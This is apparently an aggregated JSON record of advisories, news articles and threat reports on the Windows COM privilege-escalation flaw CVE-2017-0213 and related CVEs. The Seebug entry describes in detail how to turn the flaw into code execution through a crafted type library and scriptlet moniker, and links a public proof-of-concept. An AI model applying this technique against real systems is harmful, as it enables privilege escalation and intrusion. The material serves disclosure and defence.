"cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Windows COM Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0214"], "modified": "2017-05-11T07:00:00", "id": "MS:CVE-2017-0214", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0214", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. On systems with Windows 7 for x64-based Systems or later installed, this vulnerability can lead to denial of service.\n\nTo exploit the vulnerability, an attacker would have to either log on locally to an affected system, or convince a locally authenticated user to execute a specially crafted application.\n\nThe security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.\n", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0244"], "modified": "2017-05-11T07:00:00", "id": "MS:CVE-2017-0244", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0244", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege exists in Windows COM Aggregate Marshaler. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.\n\nTo exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running.\n\nThe update addresses the vulnerability by correcting how Windows COM Marshaler processes interface requests.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Windows COM Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-09-12T07:00:00", "id": "MS:CVE-2017-0213", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0213", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2020-08-24T21:45:54", "description": "A group of \u2018script kiddies\u2019 tied to Iran are targeting companies worldwide with internet-facing Remote Desktop Protocol (RDP) ports and weak credentials in order to infect them with Dharma ransomware.\n\nThe [Dharma malware](<https://threatpost.com/keys-for-dharma-ransomware-released/124024/>) (also known as Crysis) [has been distributed](<https://threatpost.com/next-gen-ransomware-packs-a-human-punch-microsoft-warns/153501/>) as a ransomware-as-a-service (RaaS) model since at least 2016. While the ransomware was previously used by advance persistent threat (APT) actors, its source code surfaced in March 2020, making it available to a wider breadth of attackers. That is the case with this latest Iran-linked threat group, which researchers say is unsophisticated and has been targeting companies across Russia, Japan, China and India with the ransomware since June.\n\n\u201cThe fact Dharma source code has been made widely available led to the increase in the number of operators deploying it,\u201d Oleg Skulkin, senior digital forensics specialist with Group-IB, said [in an analysis](<https://www.group-ib.com/media/iran-cybercriminals/>) of the attacks posted Monday. \u201cIt\u2019s surprising that Dharma landed in the hands of Iranian script kiddies who used it for financial gain, as Iran has traditionally been a land of state-sponsored attackers engaged in espionage and sabotage. Despite that these cybercriminals use quite common tactics, techniques and procedures they have been quite effective.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe threat actors are unsophisticated because they use publicly available tools both to obtain initial access and move laterally \u2013 rather than using custom malware or post-exploitation frameworks, Group-IB senior DFIR analyst Oleg Skulkin told Threatpost.\n\n\u201cThe threat actors use Persian language for Google searches on compromised servers and download tools from Iran-linked Telegram groups,\u201d Skulkin told Threatpost. \u201cIn addition, Group-IB experts saw the threat actors\u2019 attempt to brute-force accounts on an Iranian video streaming service.\u201d\n\nThe attackers in this campaign first would scan ranges of IPs for hosts that contained these vulnerable RDP ports and weak credentials, researchers said. They did so using scanning software called Masscan (which has previously been utilized by [bad actors like Fxmsp](<https://threatpost.com/notorious-hacker-fxmsp-outed/157275/>)).\n\nOnce vulnerable hosts were identified, the attackers deployed [a well-known RDP](<https://www.wilbursecurity.com/2019/10/rdp-honeypotting/>) brute force application called NLBrute, which has been sold on forums for years. Using this tool, they were able to brute-force their way into the system, and then check the validity of obtained credentials on other accessible hosts in the network.\n\nIn some attacks, attackers also attempted to elevate privileges using an exploit for an elevation privilege flaw. This medium-severity flaw ([CVE-2017-0213](<https://nvd.nist.gov/vuln/detail/CVE-2017-0213>)), which affects Windows systems, can be exploited when an attacker runs a specially crafted application.\n\nPost compromise, \u201cinterestingly, the threat actors likely didn\u2019t have a clear plan on what to do with the compromised networks,\u201d said researchers, showing their lack of sophistication. In different attacks, attackers would download various publicly-available tools to perform reconnaissance or move laterally across the network.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/24102642/table-1%40x.jpg>)To scan for accessible hosts in the compromised network, for instance, they used publicly-available tool Advanced Port Scanner. Other tools were downloaded by the attackers from Persian-language Telegram channels, researchers said.\n\n\u201cFor instance, to disable built-in antivirus software, the attackers used Defender Control and Your Uninstaller,\u201d said researchers. \u201cThe latter was downloaded from Iranian software sharing website \u2014 the Google search query in Persian language \u201c\u062f\u0627\u0646\u0644\u0648\u062f \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 youre unistaller\u201d was discovered in the Chrome artifacts.\u201d\n\nAttackers would then move laterally across the network and deploy the Dharma variant executable, encrypt data, and leave a ransom note for the victim. Researchers said, hackers typically demanded a ransom between 1 to 5 BTC (worth between 12,000 to 59,000 USD at the time of writing).\n\nResearchers said, though the exact number of victims in this campaign is unknown, the discovered forensic artifacts revealed a that the threat actors in this campaigb are \u201cfar behind the level of sophistication of big league Iranian APTs.\u201d\n\n\u201cThe newly discovered hacker group suggests that Iran, which has been known as a cradle of state-sponsored APT groups for years, now also accommodates financially motivated cybercriminals,\u201d according to Group-IB researchers.\n\nResearchers said part of this change may be attributed to the pandemic exposing a number of vulnerable hosts \u2013 with many employees working remotely \u2013 making an extremely popular attack vector for cybercriminals. Therefore, the default RDP port 3389 should be closed if not in use, they suggested.\n\n\u201cAs the attackers usually need several attempts to brute force passwords and gain access to the RDP, it is important to enable account lockout policies by limiting the number of failed login attempts per user,\u201d said researchers.\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-24T15:23:37", "type": "threatpost", "title": "Iran-Linked 'Newbie' Hackers Spread Dharma Ransomware Via RDP Ports", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2020-08-24T15:23:37", "id": "THREATPOST:22AA852BEEA43B18D4341D7ADA922536", "href": "https://threatpost.com/iran-linked-newbie-hackers-spread-dharma-ransomware-via-rdp-ports/158580/", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-06T21:58:42", "description": "A recent slew of related ransomware attacks on top videogame companies has been associated with the notorious Chinese-linked APT27 threat group, suggesting that the advanced persistent threat (APT) is swapping up its historically espionage centralized tactics to adopt ransomware, a new report says.\n\nResearchers noticed the \u201cstrong links\u201d to APT27 when they were brought in as part of incident response for ransomware activity that affected several major gaming companies globally last year as part of a supply-chain attack. Details of these incidents (including specific company names and the timeline) are scant. However, while researchers told Threatpost that they could not name the specific gaming companies attacked, they said that five companies were affected. What\u2019s more, two of the affected companies are \u201camong the largest in the world,\u201d they said.\n\nAPT27 (also known as Bronze Union, LuckyMouse, and Emissary Panda), [is believed to operate from the People\u2019s Republic of China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>) and has been around since 2013, researchers said. The group has historically leveraged publicly available tools to access networks with an aim of collecting political and military intelligence. And, it\u2019s previously been focused on cyberespionage and data theft, rather than monetary profit.\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\n\u201cPreviously, APT27 was not necessarily focused on financial gain, and so employing ransomware-actor tactics is highly unusual. However this incident occurred at a time where COVID-19 was rampant across China, with lockdowns being put into place, and therefore a switch to a financial focus would not be surprising,\u201d according to researchers with Profero and Security Joes, [in a joint Monday analysis](<https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf>) [PDF].\n\n## **The Supply-Chain Attack**\n\nThe initial infection vector for the attack was through a third-party service provider, that had been previously infected through another third-party service provider, researchers said.\n\nUpon further investigation into the security incident, researchers discovered malware samples linked to a campaign from the beginning of 2020, [called DRBControl](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia>). Trend Micro researchers who previously discovered this campaign campaign noted that it had links to APT27 and the [Winnti supply-chain specialist gang](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>). The hallmarks of the DRBControl backdoor attack was that it hit gambling companies, and used Dropbox for command-and-control (C2) communications.\n\nProfero and Security Joes researchers discovered a \u201cvery similar sample\u201d of DRBControl in the more recent campaign (which they dubbed the \u201cClambling\u201d sample) \u2013 though this variant lacked the Dropbox capabilities.\n\nResearchers found that DRBControl \u2013 as well as a PlugX sample \u2013 was then loaded into memory using a Google Updater executable, which was vulnerable to DLL side-loading (side-loading is the process of using a malicious DLL to spoof a legitimate one, and then relying on legitimate Windows executables to execute the malicious code). Both samples used the signed Google Updater, and both DLLs were labeled goopdate.dll, researchers said.\n\n\u201cFor each of the two samples, there was a legitimate executable, a malicious DLL and a binary file consisting of shellcode responsible for extracting the payload from itself and running it in memory,\u201d said researchers.\n\nAfter the threat actors gained a foothold onto the company systems through the third-party compromise, an ASPXSpy webshell was deployed, to assist in lateral movement.\n\nAnother process that stood out in this incident was the encryption of core servers using BitLocker, which is a drive encryption tool built into Windows, said researchers.\n\n\u201cThis was particularly interesting, as in many cases threat actors will drop ransomware to the machines, rather than use local tools,\u201d they said.\n\n## **APT27 Clues **\n\nResearchers observed \u201cextremely strong links\u201d to APT27 in terms of code similarities, and tactics, techniques and procedures (TTPs).\n\nResearchers for instance said that they found similarities between the DRBControl sample and older confirmed APT27 implants. In addition, a modified version of the ASPXSpy webshell used in the campaign was previously seen in APT27-attributed cyberattacks. And, alongside the discovered backdoor, researchers also found a binary responsible for escalating privileges by exploiting CVE-2017-0213, a[ Microsoft Windows Server vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-0213>) that APT27 has used before.\n\n\u201cAPT27 has been known to use this exploit to escalate privileges in the past; with one incident resulting in a cryptominer being dropped to the system,\u201d said researchers.\n\nBeyond the arsenal of tools matching up to previous APT27 operations, researchers noted code similarities with previous APT27 campaigns; and, the domains used in this operation were matched to other operations linked to APT27 previously, Omri Segev Moyal, CEO of Profero, told Threatpost.\n\nResearchers also pointed to similarities in various processes used within the attack that link back to previous APT27 attacks, including the group\u2019s method of using the number of arguments to execute different functions, and the usage of DLL side-loading with the main payload stored in a separate file.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** Is your company\u2019s software supply-chains prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET.\n\nWrite a comment\n\n**Share this article:**\n\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Malware](<https://threatpost.com/category/malware-2/>)\n", "cvss3": {}, "published": "2021-01-05T15:26:12", "type": "threatpost", "title": "Major Gaming Companies Hit with Ransomware Linked to APT27", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2021-01-05T15:26:12", "id": "THREATPOST:3649750E149C0B00551806E47C047B39", "href": "https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Windows COM Aggregate Marshaler allows for privilege escalation when an attacker runs a specially crafted application.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-28T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2022-03-28T00:00:00", "id": "CISA-KEV-CVE-2017-0213", "href": "", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}], "myhack58": [{"lastseen": "2017-06-08T06:18:38", "edition": 2, "description": "CVE-2017-0213 Windows COM elevation of privilege vulnerability components take a look at this vulnerability:\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0213>\n\nWindows COM Aggregate Marshaler in the realization of the presence of Privilege escalation vulnerability allows a remote attacker to elevate privileges to execute arbitrary code.\n\nVernacular: in package a COM component can provide the right\n\nMicrosoft's official said:\n\nElevation of privileges exists in the Windows COM package. An attacker successfully exploited the vulnerability could run arbitrary code with higher privileges. In order to exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability. This vulnerability itself does not allow arbitrary code to run. However, the vulnerability may be associated with one or more vulnerabilities such as remote code execution vulnerabilities and the another privilege level, used together, can be in the running with elevated privileges.\n\nThe affected versions are as follows:\n\n| | | | \n---|---|---|--- \nProduct | Version | Update | Tested \nWindows 10 | | | \u221a \nWindows 10 | 1511 | | \nWindows 10 | 1607 | | \nWindows 10 | 1703 | | \u221a \nWindows 7 | | SP1 | \u221a \nWindows 8.1 | | | \nWindows RT 8.1 | | | \nWindows Server 2008 | | SP2 | \nWindows Server 2008 | R2 | SP1 | \nWindows Server 2012 | | | \nWindows Server 2012 | R2 | | \nWindows Server 2016 | | | \n\n**[1] [[2]](<86826_2.htm>) [next](<86826_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-06-08T00:00:00", "title": "CVE-2017-0213 Windows COM elevation of privilege vulnerability-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-06-08T00:00:00", "id": "MYHACK58:62201786826", "href": "http://www.myhack58.com/Article/html/3/62/2017/86826.htm", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T11:56:57", "description": "### Summary:\r\nWhen accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.\r\n\r\n### Description:\r\n\r\nQuerying for an IID on a OOP (or remote) COM object calls the ORPC method RemQueryInterface or RemQueryInterface2 on the default proxy. This request is passed to the remote object which queries the implementation object and if successful returns a marshaled representation of that interface to the caller. \r\n\r\nThe difference between RemQueryInterface and RemQueryInterface2 (RQI2) is how the objects are passed back to the caller. For RemQueryInterface the interface is passed back as a STDOBJREF which only contains the basic OXID/OID/IPID information to connect back. RemQueryInterface2 on the other hand passes back MInterfacePointer structures which is an entire OBJREF. The rationale, as far as I can tell, is that RQI2 is used for implementing in-process handlers, some interfaces can be marshaled using the standard marshaler and others can be custom marshaled. This is exposed through the Aggregate Standard Marshaler. \r\n\r\nThe bug lies in the implementation of unpacking the results of the the RQI2 request in CStdMarshal::Finish_RemQIAndUnmarshal2. For each MInterfacePointer CStdMarshal::UnmarshalInterface is called passing the IID of the expected interface and the binary data wrapped in an IStream. CStdMarshal::UnmarshalInterface blindly unmarshals the interface, which creates a local proxy object but the proxy is created for the IID in the OBJREF stream and NOT the IID requested in RQI2. No further verification occurs at this point and the created proxy is passed back up the call stack until the received by the caller (through a void** obviously). \r\n\r\nIf the IID in the OBJREF doesn\u2019t match the IID requested the caller doesn\u2019t know, if it calls any methods on the expected interface it will be calling a type confused object. This could result in crashes in the caller when it tries to access methods on the expected interface which aren\u2019t there or are implemented differently. You could probably also return a standard OBJREF to a object local to the caller, this will result in returning the local object itself which might have more scope for exploiting the type confusion. In order to get the caller to use RQI2 we just need to pass it back an object which is custom marshaled with the Aggregate Standard Marshaler. This will set a flag on the marshaler which indicates to always use the aggregate marshaler which results in using RQI2 instead of RQI. As this class is a core component of COM it\u2019s trusted and so isn\u2019t affected by the EOAC_NO_CUSTOM_MARSHAL setting.\r\n\r\nIn order to exploit this a different caller needs to call QueryInterface on an object under a less trusted user's control. This could be a more privileged user (such as a sandbox broker), or a privileged service. This is pretty easy pattern to find, any method in an exposed interface on a more trusted COM object which takes an interface pointer or variant would potentially be vulnerable. For example IPersistStream takes an IStream interface pointer and will call methods on it. Another type of method is one of the various notification interfaces such as IBackgroundCopyCallback for BITS. This can probably also be used remotely if the attacker has the opportunity to inject an OBJREF stream into a connection which is set to CONNECT level security (which seems to be the default activation security). \r\n\r\nOn to exploitation, as you well know I\u2019ve little interest in exploiting memory corruptions, especially as this would either this will trigger CFG on modern systems or would require a very precise lineup of expected method and actual called method which could be tricky to exploit reliably. However I think at least using this to escape a sandbox it might be your only option. So I\u2019m not going to do that, instead I\u2019m going to exploit it logically, the only problem is this is probably unexploitable from a sandbox (maybe) and requires a very specific type of callback into our object. \r\n\r\nThe thing I\u2019m going to exploit is in the handling of OLE Automation auto-proxy creation from type libraries. When you implement an Automation compatible object you could implement an explicit proxy but if you\u2019ve already got a Type library built from your IDL then OLEAUT32 provides an alternative. If you register your interface with a Proxy CLSID for PSOAInterface or PSDispatch then instead of loading your PS DLL it will load OLEAUT32. The proxy loader code will lookup the interface entry for the passed IID to see if there\u2019s a registered type library associated with it. If there is the code will call LoadTypeLib on that library and look up the interface entry in the type library. It will then construct a custom proxy object based on the type library information. \r\n\r\nThe trick here is while in general we don\u2019t control the location of the type library (so it\u2019s probably in a location we can write to such as system32) if we can get an object unmarshaled which indicates it\u2019s IID is one of these auto-proxy interfaces while the privileged service is impersonating us we can redirect the C: drive to anywhere we like and so get the service to load an arbitrary type library file instead of a the system one. One easy place where this exact scenario occurs is in the aforementioned BITS SetNotifyInterface function. The service first impersonates the caller before calling QI on the notify interface. We can then return an OBJREF for a automation IID even though the service asked for a BITS callback interface.\r\n\r\nSo what? Well it\u2019s been known for almost 10 years that the Type library file format is completely unsafe. It was reported and it wasn\u2019t changed, Tombkeeper highlighted this in his \u201cSexrets [sic] of LoadLibrary\u201d presentation at CSW 2015. You can craft a TLB which will directly control EIP. Now you\u2019d assume therefore I\u2019m trading a unreliable way of getting EIP control for one which is much easier, if you assume that you\u2019d be wrong. Instead I\u2019m going to abuse the fact that TLBs can have referenced type libraries, which is used instead of embedding the type definitions inside the TLB itself. When a reference type is loaded the loader will try and look up the TLB by its GUID, if that fails it will take the filename string and pass it verbatim to LoadTypeLib. It\u2019s a lesser know fact that this function, if it fails to find a file with the correct name will try and parse the name as a moniker. Therefore we can insert a scriptlet moniker into the type library, when the auto-proxy generator tries to find how many functions the interface implements it walks the inheritance chain, which causes the referenced TLB to be loaded, which causes a scriptlet moniker to be loaded and bound which results in arbitrary execution in a scripting language inside the privileged COM caller. \r\n\r\nThe need to replace the C: drive is why this won\u2019t work as a sandbox escape. Also it's a more general technique, not specific to this vulnerability as such, you could exploit it in the low-level NDR marshaler layer, however it\u2019s rare to find something impersonating the caller during the low-level unmarshal. Type libraries are not loaded using the flag added after CVE-2015-1644 which prevent DLLs being loaded from the impersonate device map. I think you might want to fix this as well as there\u2019s other places and scenarios this can occur, for example there\u2019s a number of WMI services (such as anything which touches GPOs) which result in the ActiveDS com object being created, this is automation compatible and so will load a type library while impersonating the caller. Perhaps the auto-proxy generated should temporarily disable impersonation when loading the type library to prevent this happening. \r\n\r\n### Technologies Affected\r\n* Microsoft Windows 10 Version 1607 for 32-bit Systems\r\n* Microsoft Windows 10 Version 1607 for x64-based Systems\r\n* Microsoft Windows 10 for 32-bit Systems\r\n* Microsoft Windows 10 for x64-based Systems\r\n* Microsoft Windows 10 version 1511 for 32-bit Systems\r\n* Microsoft Windows 10 version 1511 for x64-based Systems\r\n* Microsoft Windows 10 version 1703 for 32-bit Systems\r\n* Microsoft Windows 10 version 1703 for x64-based Systems\r\n* Microsoft Windows 7 for 32-bit Systems SP1\r\n* Microsoft Windows 7 for x64-based Systems SP1\r\n* Microsoft Windows 8.1 for 32-bit Systems\r\n* Microsoft Windows 8.1 for x64-based Systems\r\n* Microsoft Windows RT 8.1\r\n* Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\r\n* Microsoft Windows Server 2008 R2 for x64-based Systems SP1\r\n* Microsoft Windows Server 2008 for 32-bit Systems SP2\r\n* Microsoft Windows Server 2008 for Itanium-based Systems SP2\r\n* Microsoft Windows Server 2008 for x64-based Systems SP2\r\n* Microsoft Windows Server 2012\r\n* Microsoft Windows Server 2012 R2\r\n* Microsoft Windows Server 2016\r\n\r\n### Proof of Concept\r\n`https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213`", "cvss3": {}, "published": "2017-07-04T00:00:00", "type": "seebug", "title": "Microsoft Windows COM Local Privilege Escalation Vulnerability(CVE-2017-0213)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1644", "CVE-2017-0213"], "modified": "2017-07-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96267", "id": "SSV:96267", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2019-01-27T23:01:52", "description": "#### Introduction\n\nFireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's [Managed Defense](<https://www.fireeye.com/solutions/managed-defense.html>) has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.\n\nOn Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity [targeting Energy and Aerospace industries](<https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html>). Recent public reporting indicated possible links between the confirmed APT33 spear phishing and [destructive SHAMOON attacks](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/>); however, we were unable to independently verify this claim. FireEye\u2019s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.\n\n> 45 days ago, during 24x7 monitoring, [#ManagedDefense](<https://twitter.com/hashtag/ManagedDefense?src=hash&ref_src=twsrc%5Etfw>) detected & contained an attempted intrusion from newly-identified adversary infrastructure*. \n \nIt is C2 for a code family we track as POWERTON. \n \n*hxxps://103.236.149[.]100/api/info\n> \n> \u2014 FireEye (@FireEye) [December 15, 2018](<https://twitter.com/FireEye/status/1073744224510722048?ref_src=twsrc%5Etfw>)\n\n#### Identifying the Overlap in Threat Activity\n\nFireEye augments our expertise with an [internally-developed similarity engine](<https://www.camlis.org/matthew-berninger/>) to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then 